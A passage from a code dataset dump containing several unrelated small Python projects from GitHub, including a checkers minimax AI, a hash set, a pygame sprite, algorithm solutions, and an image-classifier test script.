point\n else:\n return -point\n\n\n # create the search tree for minmax\n # def create_tree(self, root, depth=1):\n # if depth == 0:\n # return root\n # else:\n # move_available = self.board.get_all_possible_moves(self.opponent(self.color))\n # for i in range(len(move_available)):\n # for j in range(len(move_available[i])):\n # return root\n\n\n\n\n ## the min-max search\n \"\"\"def min_max(self, children: [Node], color):\n determineMinMax = lambda color, priorityMapColor: max if color == priorityMapColor else min\n priority_map = defaultdict(list)\n \"\"\"\n '''\n def AlphaBetaSearch(self) -> Move:\n _, move = self.maxValue(1)\n return move\n\n def maxValue(self, depth: int = 0,a: int = float('-inf'),b: int = float('inf')) -> (int, Move):\n\n if self.board.is_win(self.color) != 0 or depth == 0:\n #print(self.evaluate_score())\n return (self.evaluate_score(), [])\n\n for checkMoves in self.board.get_all_possible_moves(self.color):\n for move in checkMoves:\n self.board.make_move(move, self.color)\n currScore, _ = self.minValue(depth - 1,a,b)\n self.board.undo()\n if currScore > b:\n return float('inf')\n a = max(a,currScore)\n return a,\n\n\n def minValue(self, depth: int = 0,a: int = float('-inf'),b: int = float('inf')) -> (int, Move):\n if self.board.is_win(self.color) != 0 or depth == 0:\n #print(self.evaluate_score())\n return (self.evaluate_score(), [])\n\n for checkMoves in self.board.get_all_possible_moves(self.color):\n for move in checkMoves:\n self.board.make_move(move, self.color)\n currScore, _ = self.maxValue(depth - 1)\n self.board.undo()\n if currScore > bestScore:\n bestScore, bestMove = currScore, move\n return (bestScore, bestMove)\n '''\n\n def minmaxSearch(self) -> Move:\n _, move = self.maxValue(7)\n\n # move = self.greedy(self.board.get_all_possible_moves(self.color), max)[1]\n\n return 
move\n\n\n def maxValue(self, depth: int = 0, myTurn: bool = True) -> (int, Move):\n color = self.color if myTurn else self.opponent[self.color]\n if self.board.is_win(color) != 0:\n return (self.evaluate_score(myTurn), self.board.get_all_possible_moves(color)[0][0] if len(self.board.get_all_possible_moves(color)) != 0 else None)\n if depth == 1:\n bestScore = -100000000\n bestMove = None\n for moves in self.board.get_all_possible_moves(color):\n for move in moves:\n self.board.make_move(move, color)\n currScore = self.evaluate_score(myTurn)\n self.board.undo()\n if currScore > bestScore:\n bestScore, bestMove = currScore, move\n\n # if not hasattr(bestMove, \"seq\"):\n # return (bestScore, Move([]))\n\n return (bestScore, bestMove)\n\n bestScore = -100000000\n bestMove = None\n\n if len(self.board.get_all_possible_moves(color)) != 0:\n bestMove = self.board.get_all_possible_moves(color)[-1][-1]\n\n for moves in self.board.get_all_possible_moves(color):\n for move in moves:\n self.board.make_move(move, color)\n currScore, remaining_moves = self.maxValue(depth - 1, not myTurn)\n self.board.undo()\n if currScore > bestScore:\n bestScore, bestMove = currScore, move\n\n # if not hasattr(bestMove, \"seq\"):\n # return (bestScore, Move([]))\n\n return (bestScore, bestMove)\n\n\n def minValue(self, depth: int = 0) -> (int, Move):\n if self.board.is_win(self.opponent) != 0:\n return (self.evaluate_score(), Move([]))\n if depth == 0:\n return (self.evaluate_score(), Move([]))\n\n bestScore = 100000000\n bestMove = Move([])\n\n for moves in self.board.get_all_possible_moves(self.opponent):\n for move in moves:\n self.board.make_move(move, self.opponent)\n currScore, remaining_moves = self.maxValue(depth - 1)\n self.board.undo()\n if currScore < bestScore:\n bestScore, bestMove = currScore, move\n\n\n # if not hasattr(bestMove, \"seq\"):\n # return (bestScore, Move([]))\n\n return (bestScore, bestMove)\n\n\n\n\n ## greedy algorithm\n def greedy(self, moves, func: \"function min or max\") -> (int, Move):\n \"\"\"\n give the children node and the color of checker.\n :param moves: the all possible moves from the get_all_possible_moves()\n :return the optimal moves by greedy algorithm\n \"\"\"\n point_list = defaultdict(list)\n for i in moves:\n for j in i:\n self.board.make_move(j,self.color)\n point_list[self.evaluate_score()].append(j)\n self.board.undo()\n\n return (func(point_list.keys()), point_list[func(point_list.keys())][0])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"deadpan926/checkers-python-ver2-1","sub_path":"StudentAI.py","file_name":"StudentAI.py","file_ext":"py","file_size_in_byte":7425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23744394938","text":"from SetLinkedList import*\n \nclass HashSet:\n \n def __init__(self, n_buckets):\n self.num_buckets = n_buckets\n self.buckets = []\n self.length = 0\n \n for i in range(self.num_buckets):\n self.buckets.append(linked_list())\n \n def __contains__(self, obj):\n bucket = hash(obj) % self.num_buckets\n return obj in self.buckets[bucket]\n \n \n def add(self,obj):\n bucket = hash(obj) % self.num_buckets\n if not obj in self:\n self.buckets[bucket].add_first(obj)\n self.length += 1\n \n def remove(self, obj):\n if obj in self:\n bucket = hash(obj) % self.num_buckets\n self.buckets[bucket].remove(obj)\n self.length -=1\n else:\n raise KeyError(\"Item {} not in set!\".format(key))\n \n \n def __len__(self):\n return self.length\n \n def 
keys(self):\n keys = []\n for i in range(self.num_buckets):\n cursor = self.buckets[i].head\n while cursor:\n keys.append(cursor.key)\n cursor = cursor.next\n return keys\n \n def __str__(self):\n s = \"\"\n for i in range(self.num_buckets):\n s += self.buckets[i].__str__() \n s += \"\\n\"\n \n return s\n \n \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n ","repo_name":"Duntron1000/CS271","sub_path":"Jupyter/hw1-hash/HashSet.py","file_name":"HashSet.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32746832321","text":"import pygame\nfrom pygame.locals import (\n RLEACCEL\n)\nfrom settings import (\n SCREEN_WIDTH,\n SCREEN_HEIGHT,\n SPRITE_SCALE\n)\nimport random\nfrom beam import Beam\n\nclass Enemy(pygame.sprite.Sprite):\n def __init__(self, sheet):\n super(Enemy, self).__init__()\n # self.surf = pygame.Surface((20, 10))\n # self.surf.fill((255, 255, 255))\n self.surf = sheet.get_image_name(\"enemyRed1.png\", SPRITE_SCALE)\n self.beam = sheet.get_image_name(\"fire00.png\", SPRITE_SCALE)\n self.surf.set_colorkey((255, 255, 255), RLEACCEL)\n self.rect = self.surf.get_rect(\n center=(\n random.randint(0, SCREEN_WIDTH),\n -random.randint(0, 200)\n )\n )\n self.speed = random.randint(5, 20)\n\n def fire(self):\n can_fire = random.randint(0, 100) > 80\n if can_fire:\n return Beam(self.beam, self.rect.centerx, self.rect.centery)\n\n def update(self):\n self.rect.move_ip(0, self.speed)\n if self.rect.bottom > SCREEN_HEIGHT:\n #sprite group에서 제거\n self.kill()","repo_name":"netscout/python-projects","sub_path":"pygame/firstgame/enemy.py","file_name":"enemy.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23583987541","text":"#!/usr/local/bin/python3\n\nimport logging\n\n\ndef solve(problem):\n N, R, O, Y, G, B, V = problem\n from collections import Counter\n\n opposite_colors = {\n \"R\" : [\"Y\", \"G\", \"B\"],\n \"O\" : [\"G\", \"B\", \"V\"],\n \"Y\" : [\"B\", \"V\", \"R\"],\n \"G\" : [\"V\", \"R\", \"O\"],\n \"B\" : [\"R\", \"O\", \"Y\"],\n \"V\" : [\"O\", \"Y\", \"G\"],\n }\n\n def deficit(color, counter):\n return sum(counter[c] for c in opposite_colors[color]) - counter[color]\n\n def extend(solution, node):\n if node is None:\n counter = Counter({\n \"R\" : R,\n \"O\" : O,\n \"Y\" : Y,\n \"G\" : G,\n \"B\" : B,\n \"V\" : V,\n })\n colors = [c for c in counter.keys() if deficit(c, counter) >= 0]\n else:\n c, counter = node\n colors = opposite_colors[c]\n options = []\n for color in colors:\n if counter[color] == 0:\n continue\n counter_ = Counter(counter)\n counter_[color] -= 1\n option = (color, counter_)\n options.append(option)\n options.sort(key=lambda option: counter[option[0]])\n return iter(options)\n\n def present(solution):\n return \"\".join(color for (color, counter) in solution)\n\n def accept(solution, node):\n return len(solution) == N\n\n def reject(solution, node):\n assert not node is None\n if len(solution) == N:\n c0, _ = solution[0]\n cN, _ = solution[-1]\n return not c0 in opposite_colors[cN]\n c, counter = node\n return deficit(c, counter) < 0\n\n def backtrack():\n solution = []\n options = [extend(solution, None)]\n while True:\n try:\n node = next(options[-1])\n solution.append(node)\n if reject(solution, node):\n solution.pop()\n continue\n if accept(solution, node):\n yield present(solution)\n it = extend(solution, node)\n if not it is None:\n 
options.append(it)\n else:\n solution.pop()\n except StopIteration:\n options.pop()\n if not options:\n return\n solution.pop()\n\n for s in backtrack():\n return s\n return \"IMPOSSIBLE\"\n\ndef parse_problems():\n import fileinput\n fin = fileinput.input()\n\n T = int(next(fin))\n for _ in range(T):\n yield tuple(map(int, next(fin).split()))\n\ndef main():\n import time\n logging.basicConfig(level=logging.INFO, format=\"%(message)s\")\n\n t0 = time.time()\n logging.info(\"Starting...\")\n for i, p in enumerate(parse_problems()):\n ans = solve(p)\n logging.info(\"Solved #%d\", i + 1)\n print(\"Case #{}: {}\".format(i + 1, ans))\n logging.info(\"Finished in %.2f s\", time.time() - t0)\n\nif __name__ == '__main__':\n main()\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_207/667.py","file_name":"667.py","file_ext":"py","file_size_in_byte":3026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32981023657","text":"# Implement strStr().\n#\n# Return the index of the first occurrence of needle in haystack, or -1 if needle is not part of haystack.\n#\n# Example 1:\n#\n# Input: haystack = \"hello\", needle = \"ll\"\n# Output: 2\n# Example 2:\n#\n# Input: haystack = \"aaaaa\", needle = \"bba\"\n# Output: -1\n# Clarification:\n#\n# What should we return when needle is an empty string? This is a great question to ask during an interview.\n#\n# For the purpose of this problem, we will return 0 when needle is an empty string. This is consistent to C's strstr() and Java's indexOf().\n\n\nclass Solution(object):\n def strStr(self, haystack, needle):\n \"\"\"\n :type haystack: str\n :type needle: str\n :rtype: int\n \"\"\"\n # brute force TLE\n # if not haystack or not needle:\n # return -1\n # for i in range(0, len(haystack) - len(needle)):\n # for j in range(0, len(needle)):\n # if needle[j] == haystack[i + j] and j == len(needle) - 1:\n # return i\n # if needle[j] != haystack[i + j]:\n # break\n # return -1\n\n # KMP\n if not haystack:\n return -1\n if not needle:\n return 0\n nex = self.getNext(needle)\n i, j = 0, 0\n while i < len(haystack) and j < len(needle):\n if j == -1 or needle[j] == haystack[i]:\n j += 1\n i += 1\n else:\n j = nex[j]\n if j == len(needle):\n return i - j\n else:\n return -1\n\n def getNext(self, needle):\n nex = [0] * len(needle)\n nex[0] = -1\n i, j = 0, -1\n while i < len(needle) - 1:\n if j == -1 or needle[i] == needle[j]:\n j += 1\n i += 1\n nex[i] = j\n else:\n j = nex[j]\n return nex\n\n\ns = Solution()\nprint(s.strStr(\"BBC ABCDAB ABCDABCDABDE\",\n \"\"))\n","repo_name":"yshshadow/Leetcode","sub_path":"1-50/28.py","file_name":"28.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73291901953","text":"import sys\n\nIDBFile = open(sys.argv[1], \"r\")\nConfigFile = open(sys.argv[2], \"r\")\n\nFIN = open(sys.argv[3], \"r\")\nFOUT = open(\"Out\", \"w\")\n\nBarcodeOrder = 0\nBarcodeSet = {}\nwhile True:\n line = ConfigFile.readline().strip()\n if not line:\n break\n\n line = line.split()[0]\n if not BarcodeSet.get(line):\n BarcodeSet.update({line: BarcodeOrder})\n BarcodeOrder = BarcodeOrder + 1\n\nBarcodeOrderIDB = {}\nwhile True:\n line = IDBFile.readline().strip()\n if not line:\n break\n\n line = line.split()\n BarcodeOrderInIDB = int(line[0])\n CellInIDB = \"CELL_\" + line[1]\n if not BarcodeOrderIDB.get(BarcodeOrderInIDB):\n BarcodeOrderIDB.update({BarcodeOrderInIDB: 
CellInIDB})\n\nwhile True:\n line = FIN.readline().strip()\n if not line:\n break\n\n line = line.split()[0]\n if not BarcodeSet.get(line):\n print(\"Barcode \" + line + \" not presented in Config file.\")\n LineOut = \"-\\n\"\n else:\n Order = BarcodeSet.get(line)\n if not BarcodeOrderIDB.get(Order):\n print(\"Barcode \" + line + \" not presented in IDB file.\")\n LineOut = \"-\\n\"\n else:\n Cell = BarcodeOrderIDB.get(Order)\n LineOut = Cell + \"\\n\"\n FOUT.write(LineOut)\n\n","repo_name":"ZhengmzLab/ScSmOP","sub_path":"PythonScript/ConvertBarcodeToCell.py","file_name":"ConvertBarcodeToCell.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"15549258757","text":"import os\nimport torch \nfrom torch import nn\nfrom torchvision import datasets, transforms, models\nfrom timeit import default_timer as timer\nimport pandas as pd\nimport numpy as np\nimport time\n\nroot = os.getcwd()\n\n# Gid's\n# root = \"/Users/zhiiikaiii/Documents/GitHub/cancer\"\n\nmetric_csv = True\ndef test(test_dir,bs,do,pth_path, verbose = False):\n test_transforms = transforms.Compose([transforms.Resize(224),\n transforms.ToTensor()])\n test_data = datasets.ImageFolder(test_dir, transform=test_transforms)\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n testloader = torch.utils.data.DataLoader(test_data, batch_size=bs,shuffle=True)\n model = models.densenet161(pretrained=True)\n model.classifier = nn.Sequential(nn.Linear(2208, 2208),\n nn.ReLU(inplace=True),\n nn.Dropout(do),\n nn.Linear(2208, 1024),\n nn.ReLU(inplace=True),\n nn.Dropout(do),\n nn.Linear(1024, 2),\n nn.LogSoftmax(dim=1))\n model.load_state_dict(torch.load(pth_path))\n model.to(device)\n model.eval()\n\n TP,FN,FP,TN = 0,0,0,0\n count = 0\n start = timer()\n for inputs, labels in testloader:\n inputs, labels = inputs.to(device), labels.to(device)\n outputs = model.forward(inputs)\n ps = torch.exp(outputs)\n top_p, top_class = ps.topk(1, dim=1)\n confusion_vector = top_class.flatten() / labels\n # - 1 and 1 (True Positive) 1\n # - 1 and 0 (False Positive) inf\n # - 0 and 0 (True Negative) nan\n # - 0 and 1 (False Negative) 0\n TP += torch.sum(confusion_vector == 1).item()\n FP += torch.sum(confusion_vector == float('inf')).item()\n TN += torch.sum(torch.isnan(confusion_vector)).item()\n FN += torch.sum(confusion_vector == 0).item()\n if verbose:\n if count%1000 == 0:\n end = timer()\n print(count)\n print(\"time: \", (end - start)/60, \"minutes\")\n start = end\n count +=1\n return TP,TN,FP,FN\n \n\ndef metrics_calulation (TP,TN,FP,FN):\n accuracy = (TP+TN)/(TP+TN+FP+FN)\n sensitivity = TP/(TP+FN)\n specificity = TN/(TN+FP)\n precision = TP/(TP+FP)\n F1score = TP/(TP+0.5*(FP+FN))\n assert (accuracy >= 0 and accuracy <= 1), \"Accuracy must be greater than 0 and smaller than 1\"\n assert (sensitivity >= 0 and sensitivity <= 1), \"Sensitivity must be greater than 0 and smaller than 1\"\n assert (specificity >= 0 and specificity <= 1), \"Specificity must be greater than 0 and smaller than 1\"\n assert (precision >= 0 and precision <= 1), \"Precision must be greater than 0 and smaller than 1\"\n assert (F1score >= 0 and F1score <= 1), \"F1-score must be greater than 0 and smaller than 1\"\n\n return accuracy, sensitivity, specificity, precision, F1score\n\ntest_dir = root + \"/../data/Dataset120507/test\"\n\n#Gideon's mac testing\n# test_dir= \"/Users/zhiiikaiii/Documents/GitHub/cancer/tiny/test\"\n\nmodel_names = 
os.listdir(root+ \"/../models\")\naccuracies,sensitivities,specificities,precisions,F1scores = [],[],[],[],[]\nfor pth in model_names:\n if pth[-4:] == \".pth\":\n print(\"testing : \"+ pth)\n bs = 1\n do = 0.1\n assert (bs > 0), \"Batch size cannot be < 1\"\n assert (do >= 0 and do <= 1), \"Dropout rate must be 0 >= do < 1\"\n pth_path = root + \"/../models/\"+pth\n TP,TN,FP,FN = test(test_dir,bs,do,pth_path,verbose= False)\n accuracy, sensitivity, specificity, precision, F1score = metrics_calulation(TP,TN,FP,FN)\n accuracies.append(accuracy)\n sensitivities.append(sensitivity)\n specificities.append(specificity)\n precisions.append(precision)\n F1scores.append(F1score)\n\n# cerate a \"metrics\" folder in root directory and within it \"testing\"\nif (metric_csv):\n metric_output = '/metrics/testing/'\n isExist = os.path.exists(root + metric_output)\n if not isExist:\n os.makedirs(root + metric_output)\n df = pd.DataFrame([accuracies,sensitivities,specificities,precisions,F1scores]).T\n df.columns = [\"accuracies\",\"sensitivities\",\"specificities\",\"precisions\",\"F1scores\"]\n df.insert(loc=0, column='epoch', value=np.arange(1,len(df)+1))\n now = time.strftime(\"%d%m%y_%H%M%S\")\n df.to_csv(root + metric_output + 'metrics_' + now + \".csv\", index = False)\nprint(\"finished training\")\n\n","repo_name":"gideonTeo/Cancer-","sub_path":"test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4519,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23760806557","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom ecl.identity import identity_service\nfrom ecl import resource\n\n\nclass Project(resource.Resource):\n resource_key = 'project'\n resources_key = 'projects'\n base_path = '/projects'\n service = identity_service.IdentityService()\n\n # capabilities\n allow_create = True\n allow_retrieve = True\n allow_update = True\n allow_delete = True\n allow_list = True\n patch_update = True\n\n # Properties\n #: The description of the project. *Type: string*\n description = resource.prop('description')\n #: References the domain ID which owns the project; if a domain ID is not\n #: specified by the client, the Identity service implementation will\n #: default it to the domain ID to which the client's token is scoped.\n #: *Type: string*\n domain_id = resource.prop('domain_id')\n #: Setting this attribute to ``False`` prevents users from authorizing\n #: against this project. Additionally, all pre-existing tokens authorized\n #: for the project are immediately invalidated. Re-enabling a project\n #: does not re-enable pre-existing tokens. *Type: bool*\n is_enabled = resource.prop('enabled', type=bool)\n #: Unique project name, within the owning domain. 
*Type: string*\n name = resource.prop('name')\n","repo_name":"nttcom/eclsdk","sub_path":"ecl/identity/v3/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"14655595026","text":"from random import randint\r\nfrom wan import *\r\nimport urllib.request\r\nfrom bs4 import BeautifulSoup\r\nfrom urllib import parse\r\nimport re\r\nimport requests\r\n#input : specified data structure as below\r\n# {\r\n# keyword_1 : key1\r\n# \tassociated_1 : word1\r\n# \tassociated_2 : word2\r\n# \t...\r\n# keyword_2 : \r\n# \tassociated_1 : word1\r\n# \tassociated_2 : word2\r\n# \t...\r\n# ...\r\n# keyword_n : key1\r\n# ...\r\n# }\r\n\r\n\r\n#1 Abbreviation\r\ndef generate_abbreviation(associated_words_set,n):\r\n\tname_list = phrase_generation(associated_words_set,n)\r\n\t\r\n\tname_string = '+'.join(name_list)\r\n\turl = 'https://acronymify.com/search?q='+name_string\r\n\trequest = urllib.request.Request(url,headers={'User-Agent': 'Mozilla/5.0'})\r\n\tdata = urllib.request.urlopen(request).read().decode() #UTF-8 encode\r\n\tbs = BeautifulSoup(data,'lxml')\r\n\tent = bs.find_all('tr')\r\n\tm = len(ent)\r\n\tres = []\r\n\tfor i in range(1,m):\r\n\t\tres.append(ent[i].find_all('a')[0].text)\r\n\treturn res\r\n\r\n#2 Acronym\r\ndef generate_acronym(associated_words_set,n):\r\n\tname_list = phrase_generation(associated_words_set,n)\r\n\tABB = \"\"\r\n\tfor word in name_list:\r\n\t\tABB+=word[0].upper()\r\n\treturn ABB,name_list\r\n# helper function\r\n\r\n# Helper 1\r\ndef phrase_generation(associated_words_set,n):\r\n\ta = randint(2,n) # 단어 수 결정 \r\n\tn_list = [i for i in range(0,n)]\r\n\tname_list = []\r\n\t# acronym을 만들 단어를 랜덤하게 생성 \r\n\tfor i in range(a):\r\n\t\tk = n_list.pop(randint(0,len(n_list)-1))\r\n\t\tprint('k : ',k)\r\n\t\tname_list.append(get_random_associate_word_of_kth_keyword(associated_words_set,k))\r\n\treturn name_list\r\n# Helper 2\r\ndef get_random_associate_word_of_kth_keyword(associated_words_set,k):\r\n\t\r\n\ti = randint(0,49)\r\n\tprint (' get ith number :',i)\r\n\tword = associated_words_set[k]['items'][i]['item']\r\n\treturn word\r\n\r\n# for test\r\ndef test():\r\n\ttext_string = 'fresh water white cool'\r\n\tn = len(text_string.split(' '))\r\n\tassociated_words_set = search_WAN('fresh water white cool')\r\n\tabb = generate_acronym(associated_words_set,n)\r\n\tprint(abb)\r\n\treturn","repo_name":"hyun78/Eureka","sub_path":"Eureka_web/app/combiner_1.py","file_name":"combiner_1.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6261159577","text":"# -*- coding: utf-8 -*-\nimport re\n\ndef dms2dd(degrees, minutes, seconds, direction):\n dd = float(degrees) + float(minutes)/60 + float(seconds)/(60*60);\n if direction == 'S' or direction == 'W':\n dd *= -1\n return dd;\n\ndef dd2dms(deg):\n d = int(deg)\n md = abs(deg - d) * 60\n m = int(md)\n sd = (md - m) * 60\n return [d, m, sd]\n\ndef parse_dms(dms):\n parts = re.split('[^\\d\\w]+', dms)\n lat = dms2dd(parts[0], parts[1], parts[2], parts[3])\n lng = dms2dd(parts[4], parts[5], parts[6], parts[7])\n\n return (lat, lng)\n","repo_name":"santiag0aragon/icc","sub_path":"icc/aux/lat_log_utils.py","file_name":"lat_log_utils.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"61"} +{"seq_id":"1191486043","text":"from 
math import pi\nfrom constants import ρ_p\nimport numpy as np\n\nclass Particle:\n #Lag ein tabell med tidspunkt og posisjon for kvar einskild partikkel.\n def __init__(self, diameter, init_position, init_time=0, density=ρ_p ):\n self.diameter= diameter # mm\n self.init_position = init_position # mm\n self.init_time = init_time # s\n self.density = density # kg/mm³\n self.volume = self.diameter**3 * pi * 1/6 # mm³\n self.mass = self.volume * self.density # kg\n self.radius = self.diameter/2 # mm\n self.index = 0\n self.atol = 1e-6\n self.rtol = 1e-3\n self.method = 'RK45'\n self.linear = True\n self.lift = True\n self.addedmass = True\n self.resting = False\n self.still = False\n self.wrap_counter = 0\n self.wrap_max = 50\n self.resting_tolerance = 0.01\n\n def sti_list(self):\n sti = self.sti_dict\n init = int(sti['init_time'])\n final = int(sti['final_time'])\n plott_array = np.zeros((final+1-init,4))\n for frame in range(init,final+1):\n plott_array[frame-init,:] = np.asarray(sti[frame]['position'])#+np.asarray([sti[frame]['loops']*x_width,0,0,0])\n return plott_array\n\ndef particle_copy(pa):\n return Particle(pa.diameter, pa.init_position, pa.density)\n\n","repo_name":"Havrevoll/Ribber","sub_path":"particle.py","file_name":"particle.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74215256513","text":"import numpy as np\r\nimport re\r\nimport string\r\nimport math\r\nimport preparation as prep\r\nimport table as tb\r\nimport fasttext\r\n\r\ndef readFromFile(file_path):\r\n f=open(file_path, \"r\", encoding=\"utf8\")\r\n if f.mode == 'r':\r\n contents =f.read()\r\n return contents\r\n return \"\"\r\n\r\ndef trainData(data):\r\n #remove diacritics and special symbols\r\n text = prep.stripText(data)\r\n \r\n # make 3D table of trigrams from the text\r\n table = tb.countTrigrams(data)\r\n \r\n # smooth table\r\n table = tb.smoothTable(table)\r\n return table \r\n\r\ndef testData(text, table1, table2):\r\n lm1 = tb.calculateLM(text,table1)\r\n lm2 = tb.calculateLM(text,table2)\r\n if lm1>lm2:\r\n return 1\r\n if lm2>lm1:\r\n return 2\r\n if lm1==lm2:\r\n return 1.5\r\n else:\r\n return 0\r\n\r\ndef testText(text1, table1, table2, expected):\r\n print(\"Testing text:\")\r\n print(\"expected result = \")\r\n print(expected)\r\n print(\"given result : \")\r\n result = testData(text1,table1,table2)\r\n print(result)\r\n if result==expected:\r\n print(\"Test successful\")\r\n return 1\r\n elif result == 0:\r\n print(\"Error\")\r\n return 0\r\n else:\r\n print(\"Test failed\")\r\n return 0\r\n\r\n\r\ndef prepareText(data):\r\n text = prep.stripText(data)\r\n return text\r\n\r\ndef prepareSimpleText(data):\r\n text = prep.stripText(data)\r\n text = prep.stripDia(data)\r\n return text\r\n\r\ndef testFastText(predictions,cond):\r\n if predictions[0] == cond:\r\n print(\"Test successful\")\r\n return 1\r\n else:\r\n print(\"Test failed\")\r\n return 0\r\n \r\n\r\nif __name__ == '__main__':\r\n \r\n #load text\r\n dataset1 = readFromFile(\"./sampledata1.txt\")\r\n dataset2 = readFromFile(\"./sampledata2.txt\")\r\n \r\n #train data - receive a probability table\r\n table1 = trainData(dataset1)\r\n table2 = trainData(dataset2)\r\n tableD1 = trainData(prepareSimpleText(dataset1))\r\n tableD2 = trainData(prepareSimpleText(dataset2))\r\n \r\n #preparing testing data\r\n text1 = prepareText(\"a toto je první přiklad na testováni\")\r\n text2 = prepareText(\"Druhý příklad textu pro rozpoznání jazyka 
který je napsaný v češtině. A obsahuje několik vět. Jako například tato poslední\")\r\n text3 = prepareText(\"Pôvod mena Dúbravka je založený na povestiach. Jedna hovorí, že meno dostala podľa veľkých dubových lesov, ktoré tu kedysi boli. Iná hovorí o tom, že chorvátska princezná Dúbravka, ktorá utekala pred Turkami, tu bola zajatá. Tretia je o tom, že drevorubači, ktorí rúbali v lese drevo, mali so sebou psov. Tí sa po lese naháňali. Jeden z nich sa schoval do bútľavého stromu a odtiaľ štekal. Drevorubači si medzi sebou hovorili, že dub hafká. Z toho vznikol názov Dúbravka.\")\r\n text4 = prepareText(\"Po rekonštrukcii starého súboru obchodov vznikol Obchodný dom Saratov, v ktorom je viac ako 30 prevádzok a okrem iného aj potraviny Billa, predajňa elektrospotrebičov, drogéria, pošta, lekárne, módne butiky, papiernictvo, kvetinárstvo, kaviareň a stánok s domácou a zahraničnou tlačou.\")\r\n text5 = prepareText(readFromFile(\"./sampledata5.txt\"))\r\n text6 = prepareText(readFromFile(\"./sampledata6.txt\"))\r\n text7 = prepareText(readFromFile(\"./sampledata7.txt\"))\r\n text8 = prepareText(readFromFile(\"./sampledata8.txt\"))\r\n text9 = prepareText(readFromFile(\"./sampledata9.txt\"))\r\n \r\n textD1 = prepareSimpleText(text1)\r\n textD2 = prepareSimpleText(text2)\r\n textD3 = prepareSimpleText(text3)\r\n textD4 = prepareSimpleText(text4)\r\n textD5 = prepareSimpleText(text5)\r\n textD6 = prepareSimpleText(text6)\r\n textD7 = prepareSimpleText(text7)\r\n textD8 = prepareSimpleText(text8)\r\n textD9 = prepareSimpleText(text9)\r\n \r\n #testing data with diacritics\r\n successRate = 0\r\n count = 0 \r\n print(\"Testing texts with diacritics:\")\r\n successRate += testText(text1,table1,table2,1)\r\n count+=1\r\n successRate += testText(text2,table1,table2,1)\r\n count+=1\r\n successRate += testText(text3,table1,table2,2)\r\n count+=1\r\n successRate += testText(text4,table1,table2,2)\r\n count+=1\r\n successRate += testText(text5,table1,table2,1)\r\n count+=1\r\n successRate += testText(text6,table1,table2,1)\r\n count+=1\r\n successRate += testText(text7,table1,table2,2)\r\n count+=1\r\n successRate += testText(text8,table1,table2,2)\r\n count+=1\r\n successRate += testText(text9,table1,table2,2)\r\n count+=1\r\n print(\"Success rate in %: \")\r\n print(100*successRate/count)\r\n print()\r\n print()\r\n\r\n #testing data without diacritics\r\n successRate = 0\r\n count = 0 \r\n print(\"Testing texts without diacritics:\")\r\n successRate += testText(textD1,tableD1,tableD2,1)\r\n count+=1\r\n successRate += testText(textD2,tableD1,tableD2,1)\r\n count+=1\r\n successRate += testText(textD3,tableD1,tableD2,2)\r\n count+=1\r\n successRate += testText(textD4,tableD1,tableD2,2)\r\n count+=1\r\n successRate += testText(textD5,tableD1,tableD2,1)\r\n count+=1\r\n successRate += testText(textD6,tableD1,tableD2,1)\r\n count+=1\r\n successRate += testText(textD7,tableD1,tableD2,2)\r\n count+=1\r\n successRate += testText(textD8,tableD1,tableD2,2)\r\n count+=1\r\n successRate += testText(textD9,tableD1,tableD2,2)\r\n count+=1\r\n print(\"Success rate in %: \")\r\n print(100*successRate/count)\r\n print()\r\n print()\r\n\r\n #testing text with fasttext for comparison\r\n PRETRAINED_MODEL_PATH = './lid.176.bin'\r\n model = fasttext.load_model(PRETRAINED_MODEL_PATH)\r\n\r\n successRate = 0\r\n count = 0 \r\n check = ['',('__label__cs',),('__label__sk',)]\r\n sentences = text1\r\n predictions = model.predict(sentences)\r\n print(\"testing CZ text: \")\r\n print(predictions)\r\n successRate += 
